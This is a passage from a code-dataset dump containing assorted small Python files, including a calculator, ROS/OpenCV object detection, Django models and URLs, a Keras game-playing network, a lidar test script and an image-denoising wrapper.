\nnon-negative integers and empty spaces .\n\nExample 1:\n\nInput: \"1 + 1\"\nOutput: 2\nExample 2:\n\nInput: \" 2-1 + 2 \"\nOutput: 3\nExample 3:\n\nInput: \"(1+(4+5+2)-3)+(6+8)\"\nOutput: 23\n'''\n\nfrom collections import deque\n\ndef evaluate(exp):\n exp += ['+']\n stack, sign = list(), '+'\n for ch in exp:\n if type(ch) is int:\n num = ch\n else:\n if sign == '+': stack.append(num)\n if sign == '-': stack.append(-num)\n if sign == '*': stack.append(stack.pop()*num)\n if sign == '/': stack.append(int(stack.pop()/num))\n sign = ch\n\n return sum(stack) \n\ndef build(exp):\n exp = exp.replace(' ', '')\n new_exp, num = list(['(']), 0 \n \n for ch in exp:\n if ch.isdigit():\n num = num*10 + int(ch)\n else:\n if num: new_exp.append(num)\n num = 0\n new_exp.append(ch)\n \n if num: new_exp.append(num)\n new_exp.append(')')\n \n return new_exp\n\ndef basic_calculator_two(exp):\n exp = build(exp)\n stack = []\n for val in exp:\n if val != ')':\n stack.append(val)\n else:\n partial_exp = deque()\n while stack[-1] != '(':\n partial_exp.appendleft(stack.pop())\n stack.pop()\n stack.append(evaluate(partial_exp))\n return sum(stack)\n\n","sub_path":"algorithms/math/basic_calculator_II.py","file_name":"basic_calculator_II.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"639020503","text":"#!/usr/bin/env python\nimport roslib\nroslib.load_manifest('bucket_detector')\nimport sys\nimport rospy\nimport numpy as np\nimport cv2\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import CompressedImage, Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\n\n\nclass image_converter:\n\tdef __init__(self):\n\t\tself.bridge = CvBridge()\n\t\tself.image_sub = rospy.Subscriber('/usb_cam_front/image_raw/compressed', CompressedImage, self.callback)\n\t\n\tdef callback(self,data):\n\t\tcv_image = self.bridge.compressed_imgmsg_to_cv2(data, \"bgr8\")\n\t\thsv = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)\n\n\n\t\tupper_red = np.array([220, 150, 150])\n\t\tlower_red= np.array([0, 0, 0])\n\t\t\n\t\tmask = cv2.inRange(hsv, lower_red, upper_red)\n\t\tkernel = np.ones((5,5), np.uint8)\n\t\t\n\t\tmask 
= cv2.erode(mask, kernel, iterations = 1)\n\t\tmask = cv2.dilate(mask, kernel, iterations = 1)\n\t\t\n\t\tres = cv2.bitwise_and(hsv, hsv, mask=mask)\n\n\t\tim2, cnts, hierarchy = cv2.findContours(mask.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\t\tlargestArea = 0\n\t\tlargestRect = None\n\t\tfor c in cnts:\n\t\t\tif cv2.contourArea(c) < 100:\n\t\t\t\tcontinue\n\t\t\tif cv2.contourArea(c) > largestArea:\n\t\t\t\tlargestArea = cv2.contourArea(c)\n\t\t\t\tlargestRect = cv2.boundingRect(c)\n\t\tif largestArea > 0:\n\t\t\t(x, y, w, h) = largestRect\n\t\t\tcv2.rectangle(cv_image, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\t\t\n\t\tcv2.imshow(\"Bucket Detector 2\", cv_image)\n\t\tcv2.waitKey(3)\n\ndef main(args):\n\tic = image_converter()\n\trospy.init_node('bucket_detector', anonymous=True)\n\ttry:\n\t\trospy.spin()\n\texcept KeyboardInterrupt:\n\t\tprint(\"Shut down\")\n\tcv2.destroyAllWindows()\n\nif __name__ == '__main__':\n\tmain(sys.argv)\n","sub_path":"src/buc2.py","file_name":"buc2.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"41683540","text":"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . import views as lotto_view\n\nurlpatterns = [\n url(r'^$', lotto_view.index, name='index'),\n url(r'^new/$', lotto_view.new , name='new'),\n url(r'^detail/(?P[0-9]+)/$', lotto_view.detail, name='detail'),\n url(r'^update/(?P[0-9]+)/$', lotto_view.update, name='update'),\n url(r'^delete/(?P[0-9]+)/$', lotto_view.delete, name='delete')\n]","sub_path":"lotto/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"83045200","text":"# -*- coding: utf-8 -*-\ndef interseção(a,b):\n cont=0\n indice=0\n if len(a) maxSteps):\n return nextWord\n else:\n return crawl(graph, conversation, nextWord, stopProbability, steps + 1,\n maxSteps)\n\n\nclass GraphLearner:\n def __init__(self, graph):\n \"\"\"graph must be an undirected weighted graph of networkx\"\"\"\n self.graph = graph\n return\n\n def getNextWord(self, conversation, word, stopProbability=0.2,\n maxSteps=10):\n return crawl(self.graph, conversation, word, stopProbability, 0,\n maxSteps)\n\n def updateRepresentation(self,\n conversation,\n timestamp,\n maxhistory,\n forgetPercent=1):\n added_edges = 0\n conv = list(conversation)\n for i in range(len(conv)):\n for j in range(i + 1, len(conv)):\n w1 = conv[i]\n w2 = conv[j]\n self.graph.node[w1]['count'] += 1\n self.graph.node[w2]['count'] += 1\n if (w2 not in self.graph.edge[w1]):\n self.graph.add_edge(\n w1, w2, {'weight': 0.0,\n 'count': 1,\n 'time': timestamp})\n added_edges += 1\n else:\n self.graph.edge[w1][w2]['count'] += 1\n self.graph.edge[w1][w2]['time'] = timestamp\n self.graph.graph['count'] += 2\n\n old_edges = []\n for e in self.graph.edges(data=True):\n if (e[2]['time'] < timestamp - maxhistory):\n old_edges.append((e[0], e[1]))\n old_edges = np.array(old_edges)\n r_edges = 0\n if (len(old_edges) > 0):\n removed_edges = old_edges[np.random.choice(\n len(old_edges),\n replace=False,\n size=int((len(old_edges) * forgetPercent) / 100))]\n for e in removed_edges:\n self.graph.graph[\n 'count'] -= self.graph.node[e[0]]['count'] + self.graph.node[e[1]]['count']\n self.graph.node[e[0]]['count'] -= self.graph.edge[e[0]][e[1]][\n 'count']\n self.graph.node[e[1]]['count'] -= self.graph.edge[e[0]][e[1]][\n 'count']\n self.graph.graph[\n 
'count'] += self.graph.node[e[0]]['count'] + self.graph.node[e[1]]['count']\n self.graph.remove_edge(e[0], e[1])\n r_edges = len(removed_edges)\n return (added_edges, r_edges)\n\n def updateWeights(self):\n for i in self.graph.edges():\n self.graph.edge[i[0]][i[1]]['weight'] = 2.0 * self.graph.edge[i[\n 0]][i[1]]['count'] / (self.graph.node[i[0]]['count'] +\n self.graph.node[i[1]]['count'])\n return\n\n def getDistanceMatrix(self):\n self.updateWeights()\n return nx.all_pairs_dijkstra_path_length(self.graph)\n\n def getSpectralDistanceMatrix(self, nodes, dimension):\n self.updateWeights()\n subgraphs = list(nx.connected_component_subgraphs(self.graph))\n distances = {}\n for subg in subgraphs:\n subnodes = subg.nodes()\n adjacency = nx.adjacency_matrix(subg, subnodes)\n lower_embedding = sklearn.manifold.spectral_embedding(\n adjacency, n_components=dimension)\n tdistances = {\n subnodes[i]: {\n subnodes[j]: scipy.spatial.distance.euclidean(\n lower_embedding[i], lower_embedding[j])\n for j in range(len(subnodes))\n }\n for i in range(len(subnodes))\n }\n distances.update(tdistances)\n return distances\n\n def getDiffusionDistanceMatrix(self, nodes, dimension=8,\n diffusion_time=10):\n self.updateWeights()\n subgraphs = list(nx.connected_component_subgraphs(self.graph))\n print(\"Number of components = {:d}\".format(len(subgraphs)))\n distances = {}\n for subg in subgraphs:\n subnodes = subg.nodes()\n geom = gm.Geometry()\n geom.set_affinity_matrix(nx.adjacency_matrix(subg, subnodes))\n geom.set_laplacian_matrix(\n nx.normalized_laplacian_matrix(subg, subnodes))\n lower_embedding = sp.spectral_embedding(\n geom,\n n_components=dimension,\n drop_first=True,\n diffusion_maps=True,\n diffusion_time=diffusion_time)\n tdistances = {\n subnodes[i]: {\n subnodes[j]: euclidean_distance(lower_embedding[i],\n lower_embedding[j])\n for j in range(len(subnodes))\n }\n for i in range(len(subnodes))\n }\n distances.update(tdistances)\n return distances\n","sub_path":"src/forTest_Shenglong/graph_learner.py","file_name":"graph_learner.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"566933057","text":"#TestError Exception.\nfrom PythonTests.Tests.Errors import TestError\n\n#RPC class.\nfrom PythonTests.Meros.RPC import RPC\n\n#Verify the Send Difficulty.\ndef verifySendDifficulty(\n rpc: RPC,\n sendDiff: bytes\n) -> None:\n if rpc.call(\"consensus\", \"getSendDifficulty\") != sendDiff.hex().upper():\n raise TestError(\"Send Difficulty doesn't match.\")\n\n#Verify the Data Difficulty.\ndef verifyDataDifficulty(\n rpc: RPC,\n dataDiff: bytes\n) -> None:\n if rpc.call(\"consensus\", \"getDataDifficulty\") != dataDiff.hex().upper():\n raise TestError(\"Data Difficulty doesn't match.\")\n","sub_path":"PythonTests/Tests/Consensus/Verify.py","file_name":"Verify.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"263068266","text":"from typing import *\nimport time\nimport datetime\nfrom collections import deque\nimport hashlib\nimport json\nimport os\nfrom logging import getLogger\nimport numpy as np\nfrom tqdm import tqdm, trange\n# noinspection PyPep8Naming\nimport keras.backend as K\nfrom keras.engine.topology import Input\nfrom keras.engine.training import Model\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.core import Activation, Dense, Flatten\nfrom keras.layers.merge import Add\nfrom 
keras.layers.normalization import BatchNormalization\nfrom keras.losses import mean_squared_error\nfrom keras.optimizers import Adam, SGD\nfrom keras.regularizers import l2\n\nfrom .config import Config, QLearnConfig\nfrom game.game_state import GameState, Winner\n\n\nlogger = getLogger(__name__)\n\ndef objective_function_for_policy(y_true, y_pred):\n # can use categorical_crossentropy??\n return K.sum(-y_true * K.log(y_pred + K.epsilon()), axis=-1)\n\n\ndef objective_function_for_value(y_true, y_pred):\n return mean_squared_error(y_true, y_pred)\n\n\ndef update_learning_rate(self, total_steps):\n # The deepmind paper says\n # ~400k: 1e-2\n # 400k~600k: 1e-3\n # 600k~: 1e-4\n\n lr = self.decide_learning_rate(total_steps)\n if lr:\n K.set_value(self.optimizer.lr, lr)\n logger.debug(f\"total step={total_steps}, set learning rate to {lr}\")\n\n\nclass ModelZero:\n\n def __init__(self, config: Config) -> None:\n self.config = config\n self.digest = None\n\n def build(self) -> None:\n mc = self.config.model\n in_x = x = Input((2, 7, 5))\n\n x = Conv2D(filters=mc.cnn_filter_num, kernel_size=mc.cnn_filter_size, padding=\"same\",\n data_format=\"channels_first\", kernel_regularizer=l2(mc.l2_reg))(x)\n x = BatchNormalization(axis=1)(x)\n x = Activation(\"relu\")(x)\n\n for _ in range(mc.res_layer_num):\n x = self._build_residual_block(x)\n\n res_out = x\n # for policy output\n x = Conv2D(filters=2, kernel_size=1, data_format=\"channels_first\",\n kernel_regularizer=l2(mc.l2_reg))(res_out)\n x = BatchNormalization(axis=1)(x)\n x = Activation(\"relu\")(x)\n x = Flatten()(x)\n # no output for 'pass'\n policy_out = Dense(315, kernel_regularizer=l2(mc.l2_reg),\n activation=\"softmax\", name=\"policy_out\")(x)\n\n x = Dense(mc.value_fc_size, kernel_regularizer=l2(mc.l2_reg),\n activation=\"relu\")(x)\n value_out = Dense(1, kernel_regularizer=l2(mc.l2_reg),\n activation=\"tanh\", name=\"value_out\")(x)\n\n self.model = Model(in_x, [policy_out, value_out], name=\"slipe_model\")\n self.compile_model()\n self.model.summary()\n\n def compile_model(self):\n self.optimizer = SGD(lr=1e-2, momentum=0.9)\n losses = [objective_function_for_policy, objective_function_for_value]\n self.model.compile(optimizer=self.optimizer, loss=losses)\n\n def _build_residual_block(self, x):\n mc = self.config.model\n in_x = x\n x = Conv2D(filters=mc.cnn_filter_num, kernel_size=mc.cnn_filter_size, padding=\"same\",\n data_format=\"channels_first\", kernel_regularizer=l2(mc.l2_reg))(x)\n x = BatchNormalization(axis=1)(x)\n x = Activation(\"relu\")(x)\n x = Conv2D(filters=mc.cnn_filter_num, kernel_size=mc.cnn_filter_size, padding=\"same\",\n data_format=\"channels_first\", kernel_regularizer=l2(mc.l2_reg))(x)\n x = BatchNormalization(axis=1)(x)\n x = Add()([in_x, x])\n x = Activation(\"relu\")(x)\n return x\n\n # 重みの学習\n def replay(self, wps, pi_mcts, board_logs, plus_turns, batch_size: int, beta: float) -> None:\n inputs = np.zeros((batch_size, 2, 7, 5))\n policy_true = np.zeros((batch_size, 315))\n values_true = np.zeros((batch_size)) \n indices = np.random.choice(\n np.arange(len(wps)), size=batch_size, replace=False)\n mini_batch = [(wps[i], pi_mcts[i], board_logs[i], plus_turns[i]) for i in indices]\n\n for i, (winner, pi, board, plus_turn) in enumerate(mini_batch):\n gs = GameState()\n gs.board = board\n inputs[i] = gs.to_inputs(flip=not plus_turn) # shape=(4, 5, 5)\n policy_true[i] = pi ** beta\n values_true[i] = winner\n\n # epochsは訓練データの反復回数、verbose=0は表示なしの設定\n self.model.fit(inputs, [policy_true, values_true], epochs=1, 
verbose=0)\n\n\n @staticmethod\n def fetch_digest(weight_path: str):\n if os.path.exists(weight_path):\n m = hashlib.sha256()\n with open(weight_path, \"rb\") as f:\n m.update(f.read())\n return m.hexdigest()\n\n def load(self, config_path: str, weight_path: str) -> bool:\n if os.path.exists(weight_path): # os.path.exists(config_path) and\n logger.debug(f\"loading model from {config_path}\")\n with open(config_path, \"rt\") as f:\n self.model = Model.from_config(json.load(f))\n self.model.load_weights(weight_path)\n self.model.compile(loss='mse',\n optimizer=Adam(lr=self.config.model.learning_rate))\n self.model.summary()\n self.digest = self.fetch_digest(weight_path)\n logger.debug(f\"loaded model digest = {self.digest}\")\n return True\n else:\n logger.debug(\n f\"model files does not exist at {config_path} and {weight_path}\")\n return False\n\n def save(self, config_path: str, weight_path: str) -> None:\n logger.debug(f\"save model to {config_path}\")\n with open(config_path, \"wt\") as f:\n json.dump(self.model.get_config(), f)\n self.model.save_weights(weight_path)\n self.digest = self.fetch_digest(weight_path)\n logger.debug(f\"saved model digest {self.digest}\")\n","sub_path":"agent/model_zero.py","file_name":"model_zero.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"578873980","text":"'''\n#-----------------!!NOTICE!!-----------------#\nYOU NEED CAPACITORS TO POWER THE LIDAR\n\nThis is really important since you can do \nsome real damage to the devine your testing with\nbecause it does not consistantly draw power.\n\nCapacitance: 500 <= uC <= 1000\nCapacitanc on Website: 680uC\n\nWires Used: Red, Black, Green, Blue\n\n----SETUP----\n\nSINGLE CAPACITOR:\nThe 5v\n\nAssume . is an unused pin hole.\n+ is positive current input\n- is negative current input\nX is capacitor\nL is lidar\nIN is input power\n\nIN+ . . . . . X+ . . . . . L+\nIN- . . . . . X- . . . . . L-\n\nCAPACITORS IN PARALLEL:\n\nAssume . is an unused pin hole.\n+ is positive current input\n- is negative current input\nX is capacitor\nL is lidar\nIN is input power\nW# is wire connections (W1+ -> W1+)\n\nIN+ . . . . . . . W2+ . . . . L+\nIN- . . . . . . . W2- . . . . L-\n----------------------------------\n. W1+ . . . W2+ . . . . .\n. . . . . W1+ . . . . . \n. X+ . . . X+ . . . . . \n. X- . . . X- . . . . . \n. . . . . W2- . . . . . \n. W1- . . . W1- . . . . .\n\nConnect positive leads for capacitors to eachother\nConnect negative leads for capacitors to eachother\nPower goes into the first capacitor's positive lead\n and fed back from the last capacitor's positive lead\nGround goes into the first capacitor's negative lead\n and fed back from the last capacitor's negative lead\n \nRASPBERRY PI WIRING\n\nThe odd pin numbers are the top row starting from\nthe right side closes to the power and increases to\nthe left with the farthest pin being closest to the\nUSB ports. Here is the Pinout:\n\nRed: 6 Black: 4 Blue: 3 Green: 5\n\nuse sudo i2cdetect -y 1 to verify if it is connected\ncorrectly. \n\nPLEASE READ, values inside the DIGITALOUTPUTDEVICE is the\nGPIO pin numbers, NOT actual pin number!! 
(i.e.\nGPIO 26 = pin 37\nGPIO 19 = pin 35\nGPIO 13 = pin 33\nGPIO 6 = pin 31\n)\n\n#--------------------------------------------#\n'''\nfrom lidar_lite import Lidar_Lite\nfrom time import sleep\nfrom gpiozero import DigitalOutputDevice \n\nlidarController = [ DigitalOutputDevice(26), \n DigitalOutputDevice(19),\n DigitalOutputDevice(13),\n DigitalOutputDevice(6) ]\n\nlidar = Lidar_Lite()\n\nconnected = lidar.connect(1)\n\nif connected < -1:\n print(\"Not Connected\")\n\nif __name__ == \"__main__\":\n print(\"Starting Test\")\n while True:\n for i in range(0,4):\n if i == 0:\n lidarController[3].off()\n else:\n lidarController[i-1].off()\n lidarController[i].on()\n if i == 0:\n self.getFR()\n elif i == 1:\n self.getFL()\n elif i == 2:\n self.getBL()\n elif i == 3:\n self.getBR()\n print( str(i) + \" \" + str(lidarController[i].value))\n \n j = 0\n while j != 50:\n try:\n print(\"Distance: \"+ str(i) + \" \" + str(lidar.getDistance()))\n sleep(0.01)\n except:\n print(\"\\tRemote I/O Error Occur, Check connection\")\n sleep(0.01)\n j += 1\n\ndef getFR():\n print(\"FRONT RIGHT\")\n return lidar.getDistance()\n\ndef getFL():\n print(\"FRONT LEFT\")\n return lidar.getDistance()\n\ndef getBL():\n print(\"BACK LEFT\")\n return lidar.getDistance()\n\ndef getBR():\n print(\"BACK RIGHT\")\n return lidar.getDistance()\n","sub_path":"2018-2019/Testing/LidarTesting/lidarPinController.py","file_name":"lidarPinController.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"402154236","text":"import pry\n\n#open file\nwith open('gcodesano/cube.gcode') as f:\n content = f.readlines()\n\n#example\ncontent[0] = \"ciao\\n\"\n\n\n#save the file\nthefile = open('cube.gcode', 'w')\nfor item in content:\n thefile.write(item)\n","sub_path":"test.app/Contents/Resources/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"170332294","text":"\"\"\"\nGrayscale BM3D denoising demo file, based on Y. Mäkinen, L. Azzari, A. Foi, 2019.\nExact Transform-Domain Noise Variance for Collaborative Filtering of Stationary Correlated Noise.\nIn IEEE International Conference on Image Processing (ICIP), pp. 
185-189\n\"\"\"\n\nimport sys\nsys.path.insert(0,'../src') # wrt runDemo.sh\n\nimport numpy as np\nfrom PIL import Image\nfrom bm3d import bm3d, BM3DProfile\n#from experiment_funcs import get_experiment_noise, get_psnr, get_cropped_psnr\nimport getopt, sys \n\nimport matplotlib\nmatplotlib.use('Agg') #for display on remote node\nimport matplotlib.pyplot as plt\n\ndef read_image_3D(fname_base, FirstSliceNumber, SliceNumDigits, Nz, Ny, Nx):\n image = np.zeros((Nz, Ny, Nx), dtype=np.float32)\n for i in range(Nz):\n fname = '%s_slice%0*d.2Dimgdata' % (fname_base, SliceNumDigits, FirstSliceNumber+i)\n f = open(fname, 'rb')\n data = np.fromfile(f, ' -l -u -s \\\n -z -y -x -i -d \\n\") \n \n elif opt in (\"-f\", \"--FileName\"): \n fname_base = arg\n\n elif opt in (\"-l\", \"--LowerBound\"):\n LowerBound = float(arg)\n\n elif opt in (\"-u\", \"--UpperBound\"):\n UpperBound = float(arg)\n\n elif opt in (\"-s\", \"--Sigma_n\"):\n Sigma_n = float(arg)/255.0 \n\n elif opt in (\"-z\", \"--Nz\"):\n Nz = int(arg) \n\n elif opt in (\"-y\", \"--Ny\"):\n Ny = int(arg)\n\n elif opt in (\"-x\", \"--Nx\"):\n Nx = int(arg) \n\n elif opt in (\"-i\", \"--FirstSliceNumber\"):\n FirstSliceNumber = int(arg)\n\n elif opt in (\"-d\", \"--NumSliceDigits\"):\n SliceNumDigits = int(arg) \n \n except getopt.error as err: \n # output error, and return with an error code \n print (str(err)) \n\n return fname_base, LowerBound, UpperBound, Sigma_n, Nz, Ny, Nx, FirstSliceNumber, SliceNumDigits\n\ndef main():\n # Experiment specifications\n argumentList = sys.argv[1:] \n filename_base, vl, vh, Sigma_n, Nz, Ny, Nx, FirstSliceNumber, SliceNumDigits = read_cmdline(argumentList)\n\n # read image\n image_noisy=read_image_3D(filename_base+'_in', FirstSliceNumber, SliceNumDigits, Nz, Ny, Nx)\n\n #denoise\n image_clean = bm3d_denoise_slicewise(image_noisy, FirstSliceNumber, SliceNumDigits, Sigma_n, vl, vh) \n\n #display images\n #display_image_3D(image_noisy, filename_base+'_noisy', FirstSliceNumber, SliceNumDigits)\n #display_image_3D(image_clean, filename_base+'_clean', FirstSliceNumber, SliceNumDigits)\n\n #write image \n write_image_3D(image_clean, filename_base+'_out', FirstSliceNumber, SliceNumDigits)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"src/bm3d_wrapper.py","file_name":"bm3d_wrapper.py","file_ext":"py","file_size_in_byte":4869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"569338734","text":"from Bio import SeqIO\nfrom Bio.Alphabet import generic_dna\nfrom get_data import *\n\ncategories = {0:\"archea\", 1:\"bact\", 2:\"euk\", 3:\"viruses\"}\noutput = open(\"15000contigs_gi_pos_cat\", 'w')\npattern = '11011'\n\nfor i in categories.keys():\n with open(categories[i] + \"_\" + pattern, 'w') as output:\n with open(categories[i] + \"_15000contigs.bfast.fastq\", 'r') as file:\n records = SeqIO.parse(file, \"fastq\")\n id = 0\n second_read = False\n for r in records:\n if not second_read:\n seq = str(r.seq)\n vect = kmerize(seq, pattern, 1000)\n feat = print_vw_features(id, vect, i)\n output.write(feat)\n id += 1\n second_read = not second_read\n","sub_path":"python/gen_vw_files.py","file_name":"gen_vw_files.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"584484737","text":"import os\nimport unittest,argparse\nfrom user import server\n\ndef arg_parse():\n '''\n 解析命令行参数\n :return:\n '''\n # 初始化一个参数解析器\n parser = argparse.ArgumentParser(description=\"command 
args parser\")\n\n # user server port\n parser.add_argument(\n \"--port\",\n nargs=\"?\",\n default=50050,\n type=int,\n help=\"server port\"\n )\n # 对命令行参数进行解析,并返回一个参数对象\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n\n\n args = arg_parse()\n server.serve(args.port)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"150579849","text":"#! /usr/bin/env python3\n\n# <>\n# Copyright 2022, Lawrence Livermore National Security, LLC.\n# See the top-level COPYRIGHT file for details.\n# \n# SPDX-License-Identifier: BSD-3-Clause\n# <>\n\nfrom PoPs import database as databaseModule\n\nfOut = open( 'Outputs/copyDBs.py.copy.out', 'w' )\n\ndef _copy( fileName ) :\n\n fIn = open( fileName )\n fOut.writelines( fIn.readlines( ) )\n fIn.close( )\n\n database1 = databaseModule.read( fileName )\n database2 = database1.copy( )\n print( database2.toXML( ) )\n\n_copy( 'Answers/database.py.out' )\n_copy( 'Answers/database3.py.out' )\n_copy( 'Answers/database4.py.out' )\n\nfOut.close( )\n","sub_path":"PoPs/Test/copyDBs.py","file_name":"copyDBs.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"387394930","text":"import torch\n\n\ndef train_val_loop(model, epochs:int, train_loader, val_loader, optimizer, criterion, loss_train:list, task:int, bs:int, device, scheduler=None):\n \"\"\"\n This function will perform train loop (forward-backward pass) and also evaluate performance \n on validation data after each epoch of training. Finally losses will be printed out.\n Return:\n It returns two list containing training and validation loss\n Args:\n model: neural network model to be train\n epochs: number of epochs(times) train the model over complete train data set\n train_loader: data loader for train set\n val_loader: data loader for validation set\n optimizer: optimizer to update model parameters\n criterion: loss function to evaluate the training through loss\n task: define for which part loop is performed and save the model and results in path for that task\n bs: batch size (number of images grouped in a batch)\n device: device to which tensors will be allocated (in our case, from gpu 0 to 7)\n scheduler: update the learning rate based on chosen scheme if provided\n \"\"\"\n # store the losses after every epoch \n loss_train = []\n loss_val = []\n \n for epoch in range(epochs):\n #Training\n model.train()\n running_loss = 0\n\n for i, samples in enumerate(train_loader):\n inputs = samples['image'].to(device)\n labels = samples['label'].to(device).long()\n # labels = labels.squeeze(1\n optimizer.zero_grad()\n outputs = model(inputs)\n\n loss = criterion(outputs, labels)\n\n loss.backward()\n optimizer.step()\n ###accumulating loss for each batch\n running_loss += loss.item()\n \n if scheduler:\n # changing LR\n scheduler.step()\n\n if i%60 == 0: # intermediate progress printing\n print(\"epoch{}, iter{}, running loss: {}\".format(epoch, i, running_loss/(bs*(i+1))))\n\n loss_train.append(running_loss/len(train_loader))\n\n print(\"epoch{}, Training loss: {}\".format(epoch, running_loss/len(train_loader)))\n torch.save(model.state_dict(), f'../weights/T{task}/epoch_{epoch}.pth')\n\n #Validation\n model.eval()\n running_loss_val = 0\n for i, samples in enumerate(val_loader):\n inputs = samples['image'].to(device)\n labels = samples['label'].to(device).long()\n 
# labels = labels.squeeze(1)\n\n with torch.no_grad(): \n outputs = model(inputs)\n # loss = criterion(outputs,labels.long())\n loss = criterion(outputs,labels)\n\n ###accumulating loss for each batch\n running_loss_val += loss.item()\n\n\n #if i%10 == 0:\n loss_val.append(running_loss_val/len(val_loader))\n print(\"epoch{}, Validation loss: {}\".format(epoch, running_loss_val/len(val_loader)))\n \n return loss_train, loss_val\n\n\n","sub_path":"utils/.ipynb_checkpoints/learn-checkpoint.py","file_name":"learn-checkpoint.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"419852121","text":"import glob\nfrom lxml import etree\nimport os\n\nfor filename in glob.glob(\"*/menu.xml\"):\n\tprint(filename)\n\tfolder = filename.split(\"/\")[0]\n\ttree = etree.parse(filename)\n\tfor item in tree.xpath(\"//menuitem\"):\n\t\tif not os.path.isfile(os.path.join(folder, item.attrib.get(\"doc\"))):\n\t\t\tprint(os.path.join(folder, item.attrib.get(\"doc\")))\n\n\n","sub_path":"android_prayer_book/app/src/main/assets/prayers/check_menu.py","file_name":"check_menu.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"381013086","text":"from django.db import models\n\nfrom teams.models import Team\nfrom tournaments.models import Group, Tournament\n\nSCHEDULED = \"scheduled\"\nFIRST_HALF = \"first half\"\nHALF_TIME = \"half time\"\nSECOND_HALF = \"second half\"\nEXTRA_FIRST_HALF = \"extra first half\"\nEXTRA_SECOND_HALF = \"extra second half\"\nEXTRA_HALF_TIME = \"extra half time\"\nTIE_BREAKER = \"tie breaker\"\nOVER = \"over\"\nABANDONED = \"abandoned\"\n\n\nMATCH_STATUS_CHOICES = (\n (SCHEDULED, \"scheduled\"),\n (FIRST_HALF, \"first half\"),\n (HALF_TIME, \"half time\"),\n (SECOND_HALF, \"second half\"),\n (EXTRA_FIRST_HALF, \"extra first half\"),\n (EXTRA_SECOND_HALF, \"extra second half\"),\n (EXTRA_HALF_TIME, \"extra half time\"),\n (TIE_BREAKER, \"tie breaker\"),\n (OVER, \"over\"),\n (ABANDONED, \"abandoned\")\n)\n\nHOME_WIN = \"home win\"\nAWAY_WIN = \"away win\"\nDRAW = \"draw\"\n\nMATCH_RESULT_CHOICES = (\n (HOME_WIN, \"home win\"),\n (AWAY_WIN, \"away win\"),\n (DRAW, \"draw\")\n)\n\n\nclass Match(models.Model):\n \"\"\"\n Model representing a football team.\n \"\"\"\n tournament = models.ForeignKey(\n Tournament,\n null=True,\n on_delete=models.SET_NULL\n )\n group = models.ForeignKey(Group, null=True, on_delete=models.SET_NULL)\n kickoff = models.DateTimeField(null=True)\n home_team = models.ForeignKey(\n Team,\n null=True,\n on_delete=models.SET_NULL,\n related_name='home_team'\n )\n away_team = models.ForeignKey(\n Team,\n null=True,\n on_delete=models.SET_NULL,\n related_name='away_team'\n )\n status = models.CharField(\n max_length=32,\n choices=MATCH_STATUS_CHOICES,\n default=SCHEDULED\n )\n home_team_goals = models.PositiveSmallIntegerField(default=0)\n away_team_goals = models.PositiveSmallIntegerField(default=0)\n result = models.CharField(\n max_length=32,\n choices=MATCH_RESULT_CHOICES,\n default=DRAW\n )\n\n\nclass MatchPhoto(models.Model):\n description = models.CharField(max_length=1024, default='')\n photo = models.ImageField(upload_to=\"photos/matches\")\n match = models.ForeignKey(Match, 
on_delete=models.CASCADE)\n","sub_path":"matches/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"471098864","text":"from django.http.response import Http404\nfrom rest_framework import mixins, status\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\n\nclass MultiNestedMixinHelper():\n    def get_multi_nested_filter(self, parent, filter_dict, limit_count):\n        try:\n            if parent.parent_lookup_field or limit_count < 0:\n                limit_count = limit_count - 1\n                identifier = '{0}_{1}'.format(parent.parent_lookup_field, parent.lookup_field)\n                identifier_pk = self.kwargs[identifier]\n                parent_object = parent.parent_object.objects.get(**{parent.parent.lookup_field:identifier_pk})\n                filter_dict.update({parent.parent_lookup_field:parent_object})\n                self.get_multi_nested_filter(parent.parent, filter_dict, limit_count)\n            return filter_dict\n        except AttributeError:\n            return filter_dict\n        except:\n            raise Http404\n\n\nclass 